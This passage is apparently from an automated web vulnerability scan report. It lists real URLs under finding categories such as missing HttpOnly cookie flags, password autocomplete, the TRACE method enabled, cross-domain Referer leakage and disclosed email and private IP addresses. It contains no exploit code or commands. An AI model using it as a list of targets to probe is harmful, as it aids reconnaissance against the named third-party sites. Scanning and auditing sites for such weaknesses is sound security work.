10.95. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=19608333/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.96. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=60538233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

10.97. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=90758083/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

10.98. http://rcm.amazon.com/e/cm

10.99. http://rt.legolas-media.com/lgrt

10.100. http://sales.liveperson.net/hc/44153975/

10.101. http://segment-pixel.invitemedia.com/set_partner_uid

10.102. http://sensor2.suitesmart.com/sensor4.js

10.103. http://sensor2.suitesmart.com/sensor4.js

10.104. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/ads

10.105. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/popular

10.106. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/stats

10.107. http://social.msdn.microsoft.com/Forums/en-US/user/leaderboards

10.108. http://social.msdn.microsoft.com/Forums/en-US/user/mylinks

10.109. http://social.msdn.microsoft.com/forums/en-US/sqlsecurity/threads/

10.110. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/ads

10.111. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/popular

10.112. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/stats

10.113. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/ads

10.114. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/popular

10.115. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/stats

10.116. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/ads

10.117. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/popular

10.118. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/stats

10.119. http://social.technet.microsoft.com/Forums/en-US/stats/thissite

10.120. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

10.121. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

10.122. http://social.technet.microsoft.com/Forums/en-us/category/forefront

10.123. http://social.technet.microsoft.com/forums/en-US/exchangesvrantivirusandantispam/threads/

10.124. http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/

10.125. http://social.technet.microsoft.com/forums/en-US/identitylifecyclemanager/threads/

10.126. http://social.technet.microsoft.com/forums/undefined/Notifier

10.127. http://sync.adap.tv/sync

10.128. http://sync.mathtag.com/sync/img

10.129. http://tu.connect.wunderloop.net/TU/1/1/1/

11. Cookie without HttpOnly flag set

11.1. http://blog.domaintools.com/

11.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

11.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

11.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

11.5. http://c.microsoft.com/trans_pixel.aspx

11.6. http://cts-log.channelintelligence.com/

11.7. http://dg.specificclick.net/

11.8. http://fw.adsafeprotected.com/rjss/px/10217/116560/skeleton.js

11.9. http://mad4milk.net/

11.10. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

11.11. http://mobilebeta.microsoft.com/en-us/default.mspx

11.12. http://partner.domaining.com/link/

11.13. http://support.domaintools.com/

11.14. http://t.mookie1.com/t/v1/imp

11.15. http://t.mookie1.com/t/v1/imp/cc

11.16. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

11.17. http://a.tribalfusion.com/i.ad

11.18. http://a.tribalfusion.com/j.ad

11.19. http://ad.afy11.net/ad

11.20. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

11.21. http://ad.doubleclick.net/adj/N553.AEAOLService/B4970757.33

11.22. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

11.23. http://ad.turn.com/server/ads.js

11.24. http://ad.yieldmanager.com/pixel

11.25. http://ad.yieldmanager.com/unpixel

11.26. https://adwords.google.com/um/StartNewLogin

11.27. http://ak1.abmr.net/is/cache.vzw.com

11.28. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

11.29. http://akamai.invitemedia.com/set_partner_uid

11.30. http://akamai.mathtag.com/sync/img

11.31. http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/CB7517A5C7C813BB2A425B923265579D

11.32. http://amch.questionmarket.com/adsc/d880216/6/42158214/decide.php

11.33. http://amch.questionmarket.com/adsc/d880216/6/42158253/decide.php

11.34. http://amch.questionmarket.com/adsc/d920738/12/42738580/decide.php

11.35. http://api.bizographics.com/v1/profile.redirect

11.36. http://b.scorecardresearch.com/b

11.37. http://b.voicefive.com/b

11.38. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s91786168144611

11.39. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s938140667479

11.40. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97454771505390

11.41. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s97695995835295

11.42. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98445279321724

11.43. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s98724351870215

11.44. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s99791251700691

11.45. http://bh.contextweb.com/bh/rtset

11.46. http://c.atdmt.com/c.gif

11.47. http://c.live.com/c.gif

11.48. http://cache.vzw.com/images_b2c/shared/buttons/button_red.gif

11.49. http://cache.vzw.com/images_b2c/shared/layers/overlay_bg.gif

11.50. http://cf.addthis.com/red/p.json

11.51. http://citi.bridgetrack.com/a/s/

11.52. http://citi.bridgetrack.com/a/s/

11.53. http://citi.bridgetrack.com/track/

11.54. http://citi.bridgetrack.com/track/click.asp

11.55. http://citi.bridgetrack.com/track/click.asp

11.56. http://citi.bridgetrack.com/track/click.asp

11.57. http://citi.bridgetrack.com/track/click.asp

11.58. http://citi.bridgetrack.com/track/click.asp

11.59. http://citi.bridgetrack.com/track/click.asp

11.60. http://citi.bridgetrack.com/track/click.asp

11.61. http://citi.bridgetrack.com/track/click.asp

11.62. http://citi.bridgetrack.com/track/click.asp

11.63. http://citi.bridgetrack.com/track/click.asp

11.64. http://citi.bridgetrack.com/track/click.asp

11.65. http://citi.bridgetrack.com/track/click.asp

11.66. http://citi.bridgetrack.com/track/click.asp

11.67. http://citi.bridgetrack.com/track/click.asp

11.68. http://citi.bridgetrack.com/track/click.asp

11.69. http://cms.quantserve.com/dpixel

11.70. http://community.axosoft.com/

11.71. http://community.axosoft.com/blogs/fearthebug/archive/2011/05/09/ftb-171-custom-reports-using-date-fields.aspx

11.72. http://community.spiceworks.com/r/595

11.73. http://cspix.media6degrees.com/orbserv/hbpix

11.74. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3698952182471149434

11.75. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3698952182471149434

11.76. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

11.77. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3698952182471149434

11.78. http://d.p-td.com/r/dm/mkt/4/mpid/1051202/mpuid/3698952182471149434

11.79. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4dc0222e-3ec1-3315-901d-9f5b34470a53

11.80. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

11.81. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

11.82. http://dms.technoratimedia.com/setter.cfm

11.83. http://explore.live.com/Handlers/Plt.mvc

11.84. http://explore.live.com/windows-live-hotmail-security-checklist-faq

11.85. http://feedinformer.com/

11.86. http://googleads.g.doubleclick.net/pagead/ads

11.87. http://googleads.g.doubleclick.net/pagead/ads

11.88. http://ibid2252027210.peachd.dnsstuff.com/style.css

11.89. http://ibid2252027210.plumd.dnsstuff.com/style.css

11.90. http://ibid4216487243.plumd.dnsstuff.com/style.css

11.91. http://image2.pubmatic.com/AdServer/Pug

11.92. http://int.teracent.net/tase/int

11.93. http://js.revsci.net/gateway/gw.js

11.94. http://legolas.nexac.com/lgalt

11.95. http://m.webtrends.com/dcs8my4y8000008mal3dy2d80_5y6k/dcs.gif

11.96. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t%20/dcs.gif

11.97. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

11.98. http://m.webtrends.com/dcso6p7z7100004j151amwxpo_5q2j/dcs.gif

11.99. http://m.webtrends.com/dcsour5e80000008ybade4ttg_1i1l/dcs.gif

11.100. http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif

11.101. http://maps.google.com/maps

11.102. http://maps.google.com/maps/vp

11.103. http://odb.outbrain.com/utils/get

11.104. http://p.brilig.com/contact/bct

11.105. http://paid.outbrain.com/network/redir

11.106. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

11.107. http://phones.microsoftstore.com/r.aspx

11.108. http://pix04.revsci.net/J08781/b3/0/3/1008211/133868653.js

11.109. http://pix04.revsci.net/J08781/b3/0/3/1008211/219425509.js

11.110. http://pix04.revsci.net/J08781/b3/0/3/1008211/34052071.js

11.111. http://pix04.revsci.net/J08781/b3/0/3/1008211/446414223.js

11.112. http://pix04.revsci.net/J08781/b3/0/3/1008211/654769031.js

11.113. http://pix04.revsci.net/J08781/b3/0/3/1008211/94949941.js

11.114. http://pix04.revsci.net/J08781/b3/0/3/1008211/951237921.js

11.115. http://pixel.33across.com/ps/

11.116. http://pixel.quantserve.com/pixel

11.117. http://pixel.rubiconproject.com/tap.php

11.118. http://r.openx.net/set

11.119. http://r.turn.com/r/beacon

11.120. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=10227708/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

11.121. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=46949635/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.122. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=99071321/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.123. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=19608333/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.124. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=60538233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

11.125. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=90758083/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

11.126. http://rcm.amazon.com/e/cm

11.127. http://rt.legolas-media.com/lgrt

11.128. http://sales.liveperson.net/hc/44153975/

11.129. http://sales.liveperson.net/hc/44153975/

11.130. http://segment-pixel.invitemedia.com/set_partner_uid

11.131. http://sensor2.suitesmart.com/sensor4.js

11.132. http://sensor2.suitesmart.com/sensor4.js

11.133. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/ads

11.134. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/popular

11.135. http://social.msdn.microsoft.com/Forums/en-US/sqlsecurity/stats

11.136. http://social.msdn.microsoft.com/Forums/en-US/user/leaderboards

11.137. http://social.msdn.microsoft.com/Forums/en-US/user/mylinks

11.138. http://social.msdn.microsoft.com/forums/en-US/sqlsecurity/threads/

11.139. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/ads

11.140. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/popular

11.141. http://social.technet.microsoft.com/Forums/en-US/exchangesvrantivirusandantispam/stats

11.142. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/ads

11.143. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/popular

11.144. http://social.technet.microsoft.com/Forums/en-US/exchangesvrsecuremessaging/stats

11.145. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/ads

11.146. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/popular

11.147. http://social.technet.microsoft.com/Forums/en-US/identitylifecyclemanager/stats

11.148. http://social.technet.microsoft.com/Forums/en-US/stats/thissite

11.149. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

11.150. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

11.151. http://social.technet.microsoft.com/Forums/en-us/category/forefront

11.152. http://social.technet.microsoft.com/forums/en-US/exchangesvrantivirusandantispam/threads/

11.153. http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/

11.154. http://social.technet.microsoft.com/forums/en-US/identitylifecyclemanager/threads/

11.155. http://social.technet.microsoft.com/forums/undefined/Notifier

11.156. http://support.dnsstuff.com/KB/a20/fine-tuning-declude-v41-or-newer.aspx

11.157. http://support.dnsstuff.com/KB/a23/why-cant-i-get-my-ptr-record-from-the-dns-lookup-tool.aspx

11.158. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

11.159. http://support.dnsstuff.com/KB/a28/how-the-spf-tool-works.aspx

11.160. http://support.dnsstuff.com/KB/a29/mail-server-test-center-mismatched-dns-result-explanation.aspx

11.161. http://support.dnsstuff.com/KB/a30/explanation-optional-server-the-reverse-dns-lookup-tool.aspx

11.162. http://support.dnsstuff.com/KB/a31/explanation-of-the-mail-server-test-center-anti-spam-test.aspx

11.163. http://support.dnsstuff.com/KB/a32/available-declude-variables.aspx

11.164. http://support.dnsstuff.com/News/1/default-news-item.aspx

11.165. http://support.domaintools.com/index.php

11.166. http://sync.adap.tv/sync

11.167. http://sync.mathtag.com/sync/img

11.168. http://t2.trackalyzer.com/trackalyze.asp

11.169. http://tu.connect.wunderloop.net/TU/1/1/1/

11.170. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

12. Password field with autocomplete enabled

12.1. http://67.228.151.70:81/user_session/new

12.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

12.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

12.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

12.5. http://dnsstuff.com/new-tools-a-upgrades

12.6. http://gmf-aeroasia.co.id/

12.7. http://gmf-aeroasia.co.id/WorldClient.dll

12.8. https://secure.domaintools.com/log-in/

12.9. https://secure.domaintools.com/log-in/

12.10. http://support.dnsstuff.com/Login.aspx

12.11. http://twitter.com/

12.12. http://twitter.com/

12.13. http://twitter.com/

12.14. http://webcache.googleusercontent.com/search

12.15. https://webreps.satuitcrm.com/default.aspx

13. Source code disclosure

13.1. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

13.2. http://images.bestbuy.com/BestBuy_US/store/js/admonitor-min.js

13.3. http://meyerweb.com/eric/tools/css/reset/

14. SSL certificate

14.1. https://webreps.satuitcrm.com/

14.2. https://adwords.google.com/

14.3. https://cbks0.google.com/

14.4. https://clients6.google.com/

14.5. https://fpdownload.macromedia.com/

14.6. https://plusone.google.com/

14.7. https://secure.domaintools.com/

14.8. https://ssl.gstatic.com/

15. ASP.NET debugging enabled

16. Referer-dependent response

16.1. http://a.tribalfusion.com/i.ad

16.2. http://a.tribalfusion.com/j.ad

16.3. http://whos.amung.us/pjswidget/

17. Cross-domain POST

17.1. http://blog.domaintools.com/

17.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

17.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

17.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

17.5. http://webcache.googleusercontent.com/search

18. SSL cookie without secure flag set

19. Cross-domain Referer leakage

19.1. http://a.rad.msn.com/ADSAdClient31.dll

19.2. http://a.tribalfusion.com/j.ad

19.3. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

19.4. http://ad.doubleclick.net/adi/N5418.TribalFusion1.com/B5649401.5

19.5. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28

19.6. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29

19.7. http://ad.doubleclick.net/adj/N5823.152304.TRADEDESK/B5621931.6

19.8. http://ad.turn.com/server/ads.js

19.9. http://ad.turn.com/server/ads.js

19.10. http://ad.turn.com/server/ads.js

19.11. http://ad.yieldmanager.com/pixel

19.12. http://adadvisor.net/adscores/g.js

19.13. http://adadvisor.net/adscores/r.js

19.14. http://choices.truste.com/ca

19.15. http://choices.truste.com/ca

19.16. http://citi.bridgetrack.com/a/s/

19.17. http://cm.g.doubleclick.net/pixel

19.18. http://cm.g.doubleclick.net/pixel

19.19. http://dg.specificclick.net/

19.20. http://feedinformer.com/js/google_lander.js

19.21. http://feedinformer.com/search.php

19.22. http://gmf-aeroasia.co.id/WorldClient.dll

19.23. http://googleads.g.doubleclick.net/pagead/ads

19.24. http://googleads.g.doubleclick.net/pagead/ads

19.25. http://googleads.g.doubleclick.net/pagead/ads

19.26. http://googleads.g.doubleclick.net/pagead/ads

19.27. http://googleads.g.doubleclick.net/pagead/ads

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://groups.google.com/groups

19.44. http://ib.adnxs.com/ttj

19.45. http://ib.adnxs.com/ttj

19.46. http://ib.adnxs.com/ttj

19.47. http://ib.adnxs.com/ttj

19.48. http://jqueryui.com/themeroller/

19.49. http://maps.google.com/local_url

19.50. http://maps.google.com/maps

19.51. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

19.52. http://phones.microsoftstore.com/eCommerce/PowerReviews/pwr/engine/js/full.js

19.53. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

19.54. http://picasaweb.google.com/lh/view

19.55. http://platform0.twitter.com/widgets/follow_button.html

19.56. http://platform1.twitter.com/widgets/follow_button.html

19.57. http://rad.msn.com/ADSAdClient31.dll

19.58. http://rad.msn.com/ADSAdClient31.dll

19.59. http://rad.msn.com/ADSAdClient31.dll

19.60. http://rad.msn.com/ADSAdClient31.dll

19.61. http://rad.msn.com/ADSAdClient31.dll

19.62. http://rad.msn.com/ADSAdClient31.dll

19.63. http://rad.msn.com/ADSAdClient31.dll

19.64. http://rcm.amazon.com/e/cm

19.65. https://secure.domaintools.com/log-in/

19.66. http://social.msdn.microsoft.com/Forums/en-US/user/leaderboards

19.67. http://social.msdn.microsoft.com/Forums/en-US/user/mylinks

19.68. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.69. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.70. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.71. http://social.technet.microsoft.com/Forums/en-US/user/leaderboards

19.72. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

19.73. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

19.74. http://social.technet.microsoft.com/Forums/en-US/user/mylinks

19.75. http://social.technet.microsoft.com/Forums/en-us/user/mylinks

19.76. http://support.domaintools.com/index.php

19.77. http://translate.google.com/translate_t

19.78. http://webcache.googleusercontent.com/search

20. Cross-domain script include

20.1. http://a.tribalfusion.com/j.ad

20.2. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

20.3. http://ad.doubleclick.net/adi/N5418.TribalFusion1.com/B5649401.5

20.4. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28

20.5. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29

20.6. http://ad.turn.com/server/ads.js

20.7. http://ad.turn.com/server/ads.js

20.8. http://ad.turn.com/server/ads.js

20.9. http://analytics.microsoft.com/Sync.html

20.10. http://analytics.msn.com/Include.html

20.11. http://blog.domaintools.com/

20.12. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

20.13. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

20.14. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

20.15. http://cdn5.tribalfusion.com/media/1956006/frame.html

20.16. http://cdn5.tribalfusion.com/media/2516896//frm.html

20.17. https://clients6.google.com/static/proxy.html

20.18. http://community.axosoft.com/

20.19. http://community.axosoft.com/blogs/fearthebug/archive/2011/05/09/ftb-171-custom-reports-using-date-fields.aspx

20.20. http://dyn.com/

20.21. http://dyn.com/please-try-again

20.22. http://explore.live.com/windows-live-hotmail-security-checklist-faq

20.23. http://feed.domaintoolsblog.com/domaintools/

20.24. http://feedinformer.com/search.php

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://googleads.g.doubleclick.net/pagead/ads

20.28. http://ib.adnxs.com/ttj

20.29. http://ib.adnxs.com/ttj

20.30. http://ib.adnxs.com/ttj

20.31. http://ib.adnxs.com/ttj

20.32. http://images.bestbuy.com/BestBuy_US/store/js/dart-min.js

20.33. http://images.bestbuy.com/BestBuy_US/store/js/google-min.js

20.34. http://jqueryui.com/about

20.35. http://jqueryui.com/themeroller/

20.36. http://lookupserver.com/

20.37. http://mad4milk.net/

20.38. http://mobilebeta.microsoft.com/en-us/default.mspx

20.39. http://mzima.net/

20.40. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm

20.41. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm

20.42. http://news.bbc.co.uk/sport2/hi/football/14168601.stm

20.43. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm

20.44. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm

20.45. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm

20.46. http://picasaweb.google.com/lh/view

20.47. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=19608333/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

20.48. http://r1-ads.ace.advertising.com/site=783329/size=300250/u=2/bnum=90758083/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252F

20.49. http://satuit.com/

20.50. http://satuit.com/en/Products/SatuitSIP.aspx

20.51. http://satuit.com/products.aspx

20.52. https://secure.domaintools.com/join/

20.53. https://secure.domaintools.com/log-in/

20.54. https://secure.domaintools.com/shopping-cart/

20.55. http://social.msdn.microsoft.com/forums/en-US/sqlsecurity/threads/

20.56. http://social.technet.microsoft.com/Forums/en-us/category/forefront

20.57. http://social.technet.microsoft.com/forums/en-US/exchangesvrantivirusandantispam/threads/

20.58. http://social.technet.microsoft.com/forums/en-US/exchangesvrsecuremessaging/threads/

20.59. http://social.technet.microsoft.com/forums/en-US/identitylifecyclemanager/threads/

20.60. http://technet.microsoft.com/en-us/security/bb969102

20.61. http://technet.microsoft.com/en-us/security/bb980617

20.62. http://technet.microsoft.com/en-us/security/cc261637

20.63. http://technet.microsoft.com/en-us/security/cc297183.aspx

20.64. http://whois.domaintools.com/

21. File upload functionality

22. TRACE method is enabled

22.1. http://amch.questionmarket.com/

22.2. http://applenberry.com/

22.3. http://apps.dnsstuff.com/

22.4. http://bh.contextweb.com/

22.5. http://blog.domaintools.com/

22.6. http://dg.specificclick.net/

22.7. http://dnsstuff.com/

22.8. http://image2.pubmatic.com/

22.9. http://legolas.nexac.com/

22.10. http://picasaweb.google.com/

22.11. http://pixel.rubiconproject.com/

22.12. http://r.openx.net/

22.13. http://rt.legolas-media.com/

22.14. http://sa.bbc.co.uk/

22.15. https://secure.domaintools.com/

22.16. http://support.domaintools.com/

22.17. http://t.mookie1.com/

23. Email addresses disclosed

23.1. http://67.228.151.70:81/javascripts/controls.js

23.2. http://ads1.msn.com/library/dap.js

23.3. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/controls.js

23.4. http://applenberry.com/store/js/mage/cookies.js

23.5. http://applenberry.com/store/js/mage/translate.js

23.6. http://applenberry.com/store/js/scriptaculous/controls.js

23.7. http://applenberry.com/store/js/scriptaculous/dragdrop.js

23.8. http://applenberry.com/store/js/varien/form.js

23.9. http://applenberry.com/store/js/varien/js.js

23.10. http://applenberry.com/store/js/varien/menu.js

23.11. http://applenberry.com/store/skin/frontend/default/MAGFREE001/css/print.css

23.12. http://applenberry.com/store/skin/frontend/default/MAGFREE001/css/styles.css

23.13. http://applenberry.com/store/skin/frontend/default/MAGFREE001/css/widgets.css

23.14. http://blog.domaintools.com/

23.15. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

23.16. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

23.17. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

23.18. http://dyn.com/

23.19. http://feed.domaintoolsblog.com/domaintools/

23.20. http://groups.google.com/groups

23.21. http://i2.technet.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

23.22. http://i4.social.s-msft.com/Forums/GlobalResources/Scripts/omni_rsid_social_min.js

23.23. http://ibid4216487243.plumd.dnsstuff.com/style.css

23.24. http://images.bestbuy.com/BestBuy_US/store/js/jQuery/plugins/colorbox/colorbox/jquery.colorbox-min.js

23.25. http://jqueryui.com/about

23.26. http://jqueryui.com/themeroller/scripts/app.js

23.27. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

23.28. https://secure.domaintools.com/log-in/

23.29. http://static.bbc.co.uk/frameworks/barlesque/1.8.15//desktop/2.7/script/blq_core.js

23.30. http://static.bbc.co.uk/frameworks/barlesque/1.8.33//desktop/2.7/script/blq_core.js

23.31. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

23.32. http://support.dnsstuff.com/News/1/default-news-item.aspx

23.33. http://support.dnsstuff.com/News/root.aspx

24. Private IP addresses disclosed

24.1. http://api.facebook.com/restserver.php

24.2. http://api.facebook.com/restserver.php

24.3. http://api.facebook.com/restserver.php

24.4. http://api.facebook.com/restserver.php

24.5. http://api.facebook.com/restserver.php

24.6. http://api.facebook.com/restserver.php

24.7. http://api.facebook.com/restserver.php

24.8. http://api.facebook.com/restserver.php

24.9. http://api.facebook.com/restserver.php

24.10. http://api.facebook.com/restserver.php

24.11. http://connect.facebook.net/en_US/all.js

24.12. http://external.ak.fbcdn.net/safe_image.php

24.13. http://external.ak.fbcdn.net/safe_image.php

24.14. http://external.ak.fbcdn.net/safe_image.php

24.15. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

24.16. http://static.ak.fbcdn.net/connect.php/css/share-button-css

24.17. http://static.ak.fbcdn.net/connect.php/js/FB.Share

24.18. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.19. http://static.ak.fbcdn.net/connect/xd_proxy.php

24.20. http://static.ak.fbcdn.net/images/connect_sprite.png

24.21. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

24.22. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js

24.23. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/OxZAKD4r3bd.css

24.24. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png

